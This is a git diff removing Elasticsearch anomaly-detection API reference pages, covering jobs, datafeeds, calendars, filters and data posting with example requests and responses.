-include::delete-expired-data.asciidoc[leveloffset=+2] -//ESTIMATE -include::estimate-model-memory.asciidoc[leveloffset=+2] -//FIND -include::find-file-structure.asciidoc[leveloffset=+2] -//FLUSH -include::flush-job.asciidoc[leveloffset=+2] -//FORECAST -include::forecast.asciidoc[leveloffset=+2] -//GET -include::get-bucket.asciidoc[leveloffset=+2] -include::get-calendar.asciidoc[leveloffset=+2] -include::get-category.asciidoc[leveloffset=+2] -include::get-datafeed.asciidoc[leveloffset=+2] -include::get-datafeed-stats.asciidoc[leveloffset=+2] -include::get-influencer.asciidoc[leveloffset=+2] -include::get-job.asciidoc[leveloffset=+2] -include::get-job-stats.asciidoc[leveloffset=+2] -include::get-ml-info.asciidoc[leveloffset=+2] -include::get-snapshot.asciidoc[leveloffset=+2] -include::get-overall-buckets.asciidoc[leveloffset=+2] -include::get-calendar-event.asciidoc[leveloffset=+2] -include::get-filter.asciidoc[leveloffset=+2] -include::get-record.asciidoc[leveloffset=+2] -//OPEN -include::open-job.asciidoc[leveloffset=+2] 
-//POST -include::post-data.asciidoc[leveloffset=+2] -//PREVIEW -include::preview-datafeed.asciidoc[leveloffset=+2] -//REVERT -include::revert-snapshot.asciidoc[leveloffset=+2] -//SET/START/STOP -include::set-upgrade-mode.asciidoc[leveloffset=+2] -include::start-datafeed.asciidoc[leveloffset=+2] -include::stop-datafeed.asciidoc[leveloffset=+2] -//UPDATE -include::update-datafeed.asciidoc[leveloffset=+2] -include::update-filter.asciidoc[leveloffset=+2] -include::update-job.asciidoc[leveloffset=+2] -include::update-snapshot.asciidoc[leveloffset=+2] -//VALIDATE -//include::validate-detector.asciidoc[leveloffset=+2] -//include::validate-job.asciidoc[leveloffset=+2] - diff --git a/docs/reference/ml/anomaly-detection/apis/ml-apis.asciidoc b/docs/reference/ml/anomaly-detection/apis/ml-apis.asciidoc deleted file mode 100644 index fb2b41d646b..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/ml-apis.asciidoc +++ /dev/null @@ -1,94 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-apis]] -= {ml-cap} {anomaly-detect} APIs - -You can use the following APIs to perform {ml} {anomaly-detect} activities. - -See also <>. - -[discrete] -[[ml-api-anomaly-job-endpoint]] -== {anomaly-jobs-cap} -//* <>, <> -* <> or <> -* <> or <> -* <> or <> -* <> or <> -* <> -* <> -* <> -* <> or <> - - -[discrete] -[[ml-api-calendar-endpoint]] -== Calendars - -* <>, <> -* <>, <> -* <>, <> -* <>, <> - -[discrete] -[[ml-api-filter-endpoint]] -== Filters - -* <>, <> -* <> -* <> - -[discrete] -[[ml-api-datafeed-endpoint]] -== {dfeeds-cap} - -* <>, <> -* <>, <> -* <>, <> -* <> -* <> - - -[discrete] -[[ml-api-snapshot-endpoint]] -== Model Snapshots - -* <> -* <> -* <> -* <> - - -[discrete] -[[ml-api-result-endpoint]] -== Results - -* <> -* <> -* <> -* <> -* <> - -[discrete] -[[ml-api-file-structure-endpoint]] -== File structure - -* <> - -[discrete] -[[ml-api-ml-info-endpoint]] -== Info - -* <> - -[discrete] -[[ml-api-delete-expired-data-endpoint]] -== Delete expired data - -* <> - -[discrete] -[[ml-set-upgrade-mode-endpoint]] -== Set upgrade mode - -* <> diff --git a/docs/reference/ml/anomaly-detection/apis/open-job.asciidoc b/docs/reference/ml/anomaly-detection/apis/open-job.asciidoc deleted file mode 100644 index 94f9deb97d5..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/open-job.asciidoc +++ /dev/null @@ -1,81 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-open-job]] -= Open {anomaly-jobs} API -++++ -Open jobs -++++ - -Opens one or more {anomaly-jobs}. - -[[ml-open-job-request]] -== {api-request-title} - -`POST _ml/anomaly_detectors/{job_id}/_open` - -[[ml-open-job-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ml` or -`manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-open-job-desc]] -== {api-description-title} - -An {anomaly-job} must be opened in order for it to be ready to receive and -analyze data. It can be opened and closed multiple times throughout its -lifecycle. - -When you open a new job, it starts with an empty model. - -When you open an existing job, the most recent model state is automatically -loaded. The job is ready to resume its analysis from where it left off, once new -data is received. 
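If you omit the request body, the default `timeout` described below applies. The following request is an illustrative sketch only; it reuses the `total-requests` job from the example at the end of this page:

[source,console]
--------------------------------------------------
POST _ml/anomaly_detectors/total-requests/_open
--------------------------------------------------
// TEST[skip:illustrative example]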
- -[[ml-open-job-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - -[[ml-open-job-request-body]] -== {api-request-body-title} - -`timeout`:: - (Optional, time) Controls the time to wait until a job has opened. The default - value is 30 minutes. - -[[ml-open-job-response-body]] -== {api-response-body-title} - -`node`:: - (string) The ID of the node that the job was opened on. If the job is allowed to -open lazily and has not yet been assigned to a node, this value is an empty string. - -`opened`:: - (Boolean) For a successful response, this value is always `true`. On failure, an - exception is returned instead. - -[[ml-open-job-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -POST _ml/anomaly_detectors/total-requests/_open -{ - "timeout": "35m" -} --------------------------------------------------- -// TEST[skip:setup:server_metrics_job] - -When the job opens, you receive the following results: - -[source,console-result] ----- -{ - "opened" : true, - "node" : "node-1" -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/post-calendar-event.asciidoc b/docs/reference/ml/anomaly-detection/apis/post-calendar-event.asciidoc deleted file mode 100644 index cba26ffbeca..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/post-calendar-event.asciidoc +++ /dev/null @@ -1,102 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-post-calendar-event]] -= Add events to calendar API -++++ -Add events to calendar -++++ - -Posts scheduled events in a calendar. - -[[ml-post-calendar-event-request]] -== {api-request-title} - -`POST _ml/calendars//events` - -[[ml-post-calendar-event-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ml` or -`manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-post-calendar-event-desc]] -== {api-description-title} - -This API accepts a list of {ml-docs}/ml-calendars.html[scheduled events], each -of which must have a start time, end time, and description. - -[[ml-post-calendar-event-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::../../ml-shared.asciidoc[tag=calendar-id] - -[role="child_attributes"] -[[ml-post-calendar-event-request-body]] -== {api-request-body-title} - -`events`:: -(Required, array) A list of one of more scheduled events. The event's start and -end times may be specified as integer milliseconds since the epoch or as a -string in ISO 8601 format. -+ -.Properties of events -[%collapsible%open] -==== -`description`::: -(Optional, string) A description of the scheduled event. - -`end_time`::: -(Required, date) The timestamp for the end of the scheduled event in -milliseconds since the epoch or ISO 8601 format. - -`start_time`::: -(Required, date) The timestamp for the beginning of the scheduled event in -milliseconds since the epoch or ISO 8601 format. 
-==== - -[[ml-post-calendar-event-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -POST _ml/calendars/planned-outages/events -{ - "events" : [ - {"description": "event 1", "start_time": 1513641600000, "end_time": 1513728000000}, - {"description": "event 2", "start_time": 1513814400000, "end_time": 1513900800000}, - {"description": "event 3", "start_time": 1514160000000, "end_time": 1514246400000} - ] -} --------------------------------------------------- -// TEST[skip:setup:calendar_outages_addjob] - -The API returns the following results: - -[source,console-result] ----- -{ - "events": [ - { - "description": "event 1", - "start_time": 1513641600000, - "end_time": 1513728000000, - "calendar_id": "planned-outages" - }, - { - "description": "event 2", - "start_time": 1513814400000, - "end_time": 1513900800000, - "calendar_id": "planned-outages" - }, - { - "description": "event 3", - "start_time": 1514160000000, - "end_time": 1514246400000, - "calendar_id": "planned-outages" - } - ] -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/post-data.asciidoc b/docs/reference/ml/anomaly-detection/apis/post-data.asciidoc deleted file mode 100644 index 42b385a5159..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/post-data.asciidoc +++ /dev/null @@ -1,110 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-post-data]] -= Post data to jobs API -++++ -Post data to jobs -++++ - -Sends data to an anomaly detection job for analysis. - -[[ml-post-data-request]] -== {api-request-title} - -`POST _ml/anomaly_detectors//_data` - -[[ml-post-data-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ml` or -`manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-post-data-desc]] -== {api-description-title} - -The job must have a state of `open` to receive and process the data. - -The data that you send to the job must use the JSON format. Multiple JSON -documents can be sent, either adjacent with no separator in between them or -whitespace separated. Newline delimited JSON (NDJSON) is a possible whitespace -separated format, and for this the `Content-Type` header should be set to -`application/x-ndjson`. - -Upload sizes are limited to the Elasticsearch HTTP receive buffer size -(default 100 Mb). If your data is larger, split it into multiple chunks -and upload each one separately in sequential time order. When running in -real time, it is generally recommended that you perform many small uploads, -rather than queueing data to upload larger files. - -When uploading data, check the job data counts for progress. -The following documents will not be processed: - -* Documents not in chronological order and outside the latency window -* Records with an invalid timestamp - -IMPORTANT: For each job, data can only be accepted from a single connection at -a time. It is not currently possible to post data to multiple jobs using wildcards -or a comma-separated list. - -[[ml-post-data-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - -[[ml-post-data-query-parms]] -== {api-query-parms-title} - -`reset_start`:: - (Optional, string) Specifies the start of the bucket resetting range. - -`reset_end`:: - (Optional, string) Specifies the end of the bucket resetting range. 
- -[[ml-post-data-request-body]] -== {api-request-body-title} - -A sequence of one or more JSON documents containing the data to be analyzed. -Only whitespace characters are permitted in between the documents. - -[[ml-post-data-example]] -== {api-examples-title} - -The following example posts data from the `it_ops_new_kpi.json` file to the -`it_ops_new_kpi` job: - -[source,js] --------------------------------------------------- -$ curl -s -H "Content-type: application/json" --X POST http:\/\/localhost:9200/_ml/anomaly_detectors/it_ops_new_kpi/_data ---data-binary @it_ops_new_kpi.json --------------------------------------------------- - -When the data is sent, you receive information about the operational progress of -the job. For example: - -[source,js] ----- -{ - "job_id":"it_ops_new_kpi", - "processed_record_count":21435, - "processed_field_count":64305, - "input_bytes":2589063, - "input_field_count":85740, - "invalid_date_count":0, - "missing_field_count":0, - "out_of_order_timestamp_count":0, - "empty_bucket_count":16, - "sparse_bucket_count":0, - "bucket_count":2165, - "earliest_record_timestamp":1454020569000, - "latest_record_timestamp":1455318669000, - "last_data_time":1491952300658, - "latest_empty_bucket_timestamp":1454541600000, - "input_record_count":21435 -} ----- - -For more information about these properties, see <>. diff --git a/docs/reference/ml/anomaly-detection/apis/preview-datafeed.asciidoc b/docs/reference/ml/anomaly-detection/apis/preview-datafeed.asciidoc deleted file mode 100644 index e36f9cc9cd5..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/preview-datafeed.asciidoc +++ /dev/null @@ -1,89 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-preview-datafeed]] -= Preview {dfeeds} API - -[subs="attributes"] -++++ -Preview {dfeeds} -++++ - -Previews a {dfeed}. - -[[ml-preview-datafeed-request]] -== {api-request-title} - -`GET _ml/datafeeds//_preview` - -[[ml-preview-datafeed-prereqs]] -== {api-prereq-title} - -* If {es} {security-features} are enabled, you must have `monitor_ml`, `monitor`, -`manage_ml`, or `manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-preview-datafeed-desc]] -== {api-description-title} - -The preview {dfeeds} API returns the first "page" of results from the `search` -that is created by using the current {dfeed} settings. This preview shows the -structure of the data that will be passed to the anomaly detection engine. - -IMPORTANT: When {es} {security-features} are enabled, the {dfeed} query is -previewed using the credentials of the user calling the preview {dfeed} API. -When the {dfeed} is started it runs the query using the roles of the last user -to create or update it. If the two sets of roles differ then the preview may -not accurately reflect what the {dfeed} will return when started. To avoid -such problems, the same user that creates or updates the {dfeed} should preview -it to ensure it is returning the expected data. Alternatively, use -<> to -supply the credentials. 
- -[[ml-preview-datafeed-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=datafeed-id] - -[[ml-preview-datafeed-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -GET _ml/datafeeds/datafeed-high_sum_total_sales/_preview --------------------------------------------------- -// TEST[skip:Kibana sample data] - -The data that is returned for this example is as follows: - -[source,console-result] ----- -[ - { - "order_date" : 1575504259000, - "category.keyword" : "Men's Clothing", - "customer_full_name.keyword" : "Sultan Al Benson", - "taxful_total_price" : 35.96875 - }, - { - "order_date" : 1575504518000, - "category.keyword" : [ - "Women's Accessories", - "Women's Clothing" - ], - "customer_full_name.keyword" : "Pia Webb", - "taxful_total_price" : 83.0 - }, - { - "order_date" : 1575505382000, - "category.keyword" : [ - "Women's Accessories", - "Women's Shoes" - ], - "customer_full_name.keyword" : "Brigitte Graham", - "taxful_total_price" : 72.0 - }, - ... -] ----- diff --git a/docs/reference/ml/anomaly-detection/apis/put-calendar-job.asciidoc b/docs/reference/ml/anomaly-detection/apis/put-calendar-job.asciidoc deleted file mode 100644 index 93ea1b2156c..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/put-calendar-job.asciidoc +++ /dev/null @@ -1,53 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-put-calendar-job]] -= Add {anomaly-jobs} to calendar API -++++ -Add jobs to calendar -++++ - -Adds an {anomaly-job} to a calendar. - -[[ml-put-calendar-job-request]] -== {api-request-title} - -`PUT _ml/calendars//jobs/` - -[[ml-put-calendar-job-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ml` or -`manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-put-calendar-job-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=calendar-id] - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection-list] - -[[ml-put-calendar-job-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -PUT _ml/calendars/planned-outages/jobs/total-requests --------------------------------------------------- -// TEST[skip:setup:calendar_outages_openjob] - -The API returns the following results: - -[source,console-result] ----- -{ - "calendar_id": "planned-outages", - "job_ids": [ - "total-requests" - ] -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/put-calendar.asciidoc b/docs/reference/ml/anomaly-detection/apis/put-calendar.asciidoc deleted file mode 100644 index d39ed5c7ef1..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/put-calendar.asciidoc +++ /dev/null @@ -1,59 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-put-calendar]] -= Create calendars API -++++ -Create calendars -++++ - -Instantiates a calendar. - -[[ml-put-calendar-request]] -== {api-request-title} - -`PUT _ml/calendars/` - -[[ml-put-calendar-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ml` or -`manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-put-calendar-desc]] -== {api-description-title} - -For more information, see -{ml-docs}/ml-calendars.html[Calendars and scheduled events]. 
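As a quick illustration of the request body documented below, a calendar can be given an optional description when it is created. The description text here is hypothetical.

[source,console]
--------------------------------------------------
PUT _ml/calendars/planned-outages
{
  "description": "Planned outages for the production cluster"
}
--------------------------------------------------
// TEST[skip:illustrative sketch]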
- -[[ml-put-calendar-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=calendar-id] - -[[ml-put-calendar-request-body]] -== {api-request-body-title} - -`description`:: - (Optional, string) A description of the calendar. - -[[ml-put-calendar-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -PUT _ml/calendars/planned-outages --------------------------------------------------- -// TEST[skip:need-license] - -When the calendar is created, you receive the following results: - -[source,console-result] ----- -{ - "calendar_id": "planned-outages", - "job_ids": [] -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/put-datafeed.asciidoc b/docs/reference/ml/anomaly-detection/apis/put-datafeed.asciidoc deleted file mode 100644 index 7bc529bfba2..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/put-datafeed.asciidoc +++ /dev/null @@ -1,145 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-put-datafeed]] -= Create {dfeeds} API - -[subs="attributes"] -++++ -Create {dfeeds} -++++ - -Instantiates a {dfeed}. - -[[ml-put-datafeed-request]] -== {api-request-title} - -`PUT _ml/datafeeds/` - -[[ml-put-datafeed-prereqs]] -== {api-prereq-title} - -* You must create an {anomaly-job} before you create a {dfeed}. -* If {es} {security-features} are enabled, you must have `manage_ml` or `manage` -cluster privileges to use this API. See <> and -{ml-docs-setup-privileges}. - -[[ml-put-datafeed-desc]] -== {api-description-title} - -{ml-docs}/ml-dfeeds.html[{dfeeds-cap}] retrieve data from {es} for analysis by -an {anomaly-job}. You can associate only one {dfeed} to each {anomaly-job}. - -The {dfeed} contains a query that runs at a defined interval (`frequency`). If -you are concerned about delayed data, you can add a delay (`query_delay`) at -each interval. See {ml-docs}/ml-delayed-data-detection.html[Handling delayed data]. - -[IMPORTANT] -==== -* You must use {kib} or this API to create a {dfeed}. Do not put a -{dfeed} directly to the `.ml-config` index using the {es} index API. If {es} -{security-features} are enabled, do not give users `write` privileges on the -`.ml-config` index. -* When {es} {security-features} are enabled, your {dfeed} remembers which roles -the user who created it had at the time of creation and runs the query using -those same roles. If you provide -<>, those -credentials are used instead. 
-==== - -[[ml-put-datafeed-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=datafeed-id] - -[role="child_attributes"] -[[ml-put-datafeed-request-body]] -== {api-request-body-title} - -`aggregations`:: -(Optional, object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=aggregations] - -`chunking_config`:: -(Optional, object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=chunking-config] - -`delayed_data_check_config`:: -(Optional, object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=delayed-data-check-config] - -`frequency`:: -(Optional, <>) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=frequency] - -`indices`:: -(Required, array) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=indices] - -`job_id`:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - -`max_empty_searches`:: -(Optional,integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=max-empty-searches] - -`query`:: -(Optional, object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=query] - -`query_delay`:: -(Optional, <>) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=query-delay] - -`script_fields`:: -(Optional, object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=script-fields] - -`scroll_size`:: -(Optional, unsigned integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=scroll-size] - -`indices_options`:: -(Optional, object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=indices-options] - - -[[ml-put-datafeed-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -PUT _ml/datafeeds/datafeed-total-requests -{ - "job_id": "total-requests", - "indices": ["server-metrics"] -} --------------------------------------------------- -// TEST[skip:setup:server_metrics_job] - -When the {dfeed} is created, you receive the following results: - -[source,console-result] ----- -{ - "datafeed_id": "datafeed-total-requests", - "job_id": "total-requests", - "query_delay": "83474ms", - "indices": [ - "server-metrics" - ], - "query": { - "match_all": { - "boost": 1.0 - } - }, - "scroll_size": 1000, - "chunking_config": { - "mode": "auto" - } -} ----- -// TESTRESPONSE[s/"query_delay": "83474ms"/"query_delay": $body.query_delay/] -// TESTRESPONSE[s/"query.boost": "1.0"/"query.boost": $body.query.boost/] diff --git a/docs/reference/ml/anomaly-detection/apis/put-filter.asciidoc b/docs/reference/ml/anomaly-detection/apis/put-filter.asciidoc deleted file mode 100644 index a4c66b9ce04..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/put-filter.asciidoc +++ /dev/null @@ -1,70 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-put-filter]] -= Create filters API -++++ -Create filters -++++ - -Instantiates a filter. - -[[ml-put-filter-request]] -== {api-request-title} - -`PUT _ml/filters/` - -[[ml-put-filter-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ml` or -`manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-put-filter-desc]] -== {api-description-title} - -A {ml-docs}/ml-rules.html[filter] contains a list of strings. -It can be used by one or more jobs. Specifically, filters are referenced in -the `custom_rules` property of detector configuration objects. 
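Since the description above only states that filters are referenced from the `custom_rules` property, a sketch of that usage may help. The job name, fields, and analysis settings below are hypothetical; the rule skips results when the `highest_registered_domain` value is in the `safe_domains` filter (see the create {anomaly-jobs} API for the full detector syntax).

[source,console]
--------------------------------------------------
PUT _ml/anomaly_detectors/dns_exfiltration
{
  "analysis_config": {
    "bucket_span": "5m",
    "detectors": [
      {
        "function": "high_info_content",
        "field_name": "subdomain",
        "over_field_name": "highest_registered_domain",
        "custom_rules": [
          {
            "actions": ["skip_result"],
            "scope": {
              "highest_registered_domain": {
                "filter_id": "safe_domains",
                "filter_type": "include"
              }
            }
          }
        ]
      }
    ]
  },
  "data_description": {
    "time_field": "timestamp"
  }
}
--------------------------------------------------
// TEST[skip:illustrative sketch with hypothetical job and field names]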
- -[[ml-put-filter-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=filter-id] - -[[ml-put-filter-request-body]] -== {api-request-body-title} - -`description`:: - (Optional, string) A description of the filter. - -`items`:: - (Required, array of strings) The items of the filter. A wildcard `*` can be - used at the beginning or the end of an item. Up to 10000 items are allowed in - each filter. - -[[ml-put-filter-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -PUT _ml/filters/safe_domains -{ - "description": "A list of safe domains", - "items": ["*.google.com", "wikipedia.org"] -} --------------------------------------------------- -// TEST[skip:need-licence] - -When the filter is created, you receive the following response: - -[source,console-result] ----- -{ - "filter_id": "safe_domains", - "description": "A list of safe domains", - "items": ["*.google.com", "wikipedia.org"] -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/put-job.asciidoc b/docs/reference/ml/anomaly-detection/apis/put-job.asciidoc deleted file mode 100644 index 4a779ee2f52..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/put-job.asciidoc +++ /dev/null @@ -1,356 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-put-job]] -= Create {anomaly-jobs} API -++++ -Create jobs -++++ - -Instantiates an {anomaly-job}. - -[[ml-put-job-request]] -== {api-request-title} - -`PUT _ml/anomaly_detectors/` - -[[ml-put-job-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ml` or -`manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-put-job-desc]] -== {api-description-title} - -IMPORTANT: You must use {kib} or this API to create an {anomaly-job}. Do not put -a job directly to the `.ml-config` index using the {es} index API. If {es} -{security-features} are enabled, do not give users `write` privileges on the -`.ml-config` index. - -[[ml-put-job-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection-define] - -[role="child_attributes"] -[[ml-put-job-request-body]] -== {api-request-body-title} - -`allow_lazy_open`:: -(Optional, Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=allow-lazy-open] - -//Begin analysis_config -[[put-analysisconfig]]`analysis_config`:: -(Required, object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=analysis-config] -+ -.Properties of `analysis_config` -[%collapsible%open] -==== -`bucket_span`::: -(<>) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=bucket-span] - -`categorization_analyzer`::: -(object or string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=categorization-analyzer] - -`categorization_field_name`::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=categorization-field-name] - -`categorization_filters`::: -(array of strings) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=categorization-filters] - -//Begin analysis_config.detectors -`detectors`::: -(array) An array of detector configuration objects. Detector configuration -objects specify which data fields a job analyzes. They also specify which -analytical functions are used. You can specify multiple detectors for a job. -+ -NOTE: If the `detectors` array does not contain at least one detector, -no analysis can occur and an error is returned. 
-+ -.Properties of `detectors` -[%collapsible%open] -===== -`by_field_name`:::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=by-field-name] - -//Begin analysis_config.detectors.custom_rules -[[put-customrules]]`custom_rules`:::: -(array) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=custom-rules] -+ -.Properties of `custom_rules` -[%collapsible%open] -====== - -`actions`::: -(array) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=custom-rules-actions] - -//Begin analysis_config.detectors.custom_rules.conditions -`conditions`::: -(array) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=custom-rules-conditions] -+ -.Properties of `conditions` -[%collapsible%open] -======= -`applies_to`:::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=custom-rules-conditions-applies-to] - -`operator`:::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=custom-rules-conditions-operator] - -`value`:::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=custom-rules-conditions-value] -======= -//End analysis_config.detectors.custom_rules.conditions - -//Begin analysis_config.detectors.custom_rules.scope -`scope`::: -(object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=custom-rules-scope] -+ -.Properties of `scope` -[%collapsible%open] -======= -`filter_id`:::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=custom-rules-scope-filter-id] - -`filter_type`:::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=custom-rules-scope-filter-type] -======= -//End analysis_config.detectors.custom_rules.scope -====== -//End analysis_config.detectors.custom_rules - -`detector_description`:::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=detector-description] - -`detector_index`:::: -(integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=detector-index] -+ -If you specify a value for this property, it is ignored. 
- -`exclude_frequent`:::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=exclude-frequent] - -`field_name`:::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=detector-field-name] - -`function`:::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=function] - -`over_field_name`:::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=over-field-name] - -`partition_field_name`:::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=partition-field-name] - -`use_null`:::: -(Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=use-null] -===== -//End analysis_config.detectors - -`influencers`::: -(array of strings) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=influencers] - -`latency`::: -(<>) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=latency] - -`multivariate_by_fields`::: -(Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=multivariate-by-fields] - -//Begin analysis_config.per_partition_categorization -`per_partition_categorization`::: -(Optional, object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=per-partition-categorization] -+ -.Properties of `per_partition_categorization` -[%collapsible%open] -===== -`enabled`:::: -(Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=per-partition-categorization-enabled] - -`stop_on_warn`:::: -(Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=per-partition-categorization-stop-on-warn] -===== -//End analysis_config.per_partition_categorization - -`summary_count_field_name`::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=summary-count-field-name] -==== -//End analysis_config - -//Begin analysis_limits -[[put-analysislimits]]`analysis_limits`:: -(Optional, object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=analysis-limits] -+ -.Properties of `analysis_limits` -[%collapsible%open] -==== -`categorization_examples_limit`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=categorization-examples-limit] - -`model_memory_limit`::: -(long or string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=model-memory-limit] -==== -//End analysis_limits - -`background_persist_interval`:: -(Optional, <>) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=background-persist-interval] - -[[put-customsettings]]`custom_settings`:: -(Optional, object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=custom-settings] - -//Begin data_description -[[put-datadescription]]`data_description`:: -(Required, object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=data-description] -//End data_description - -`daily_model_snapshot_retention_after_days`:: -(Optional, long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=daily-model-snapshot-retention-after-days] - -`description`:: -(Optional, string) A description of the job. 
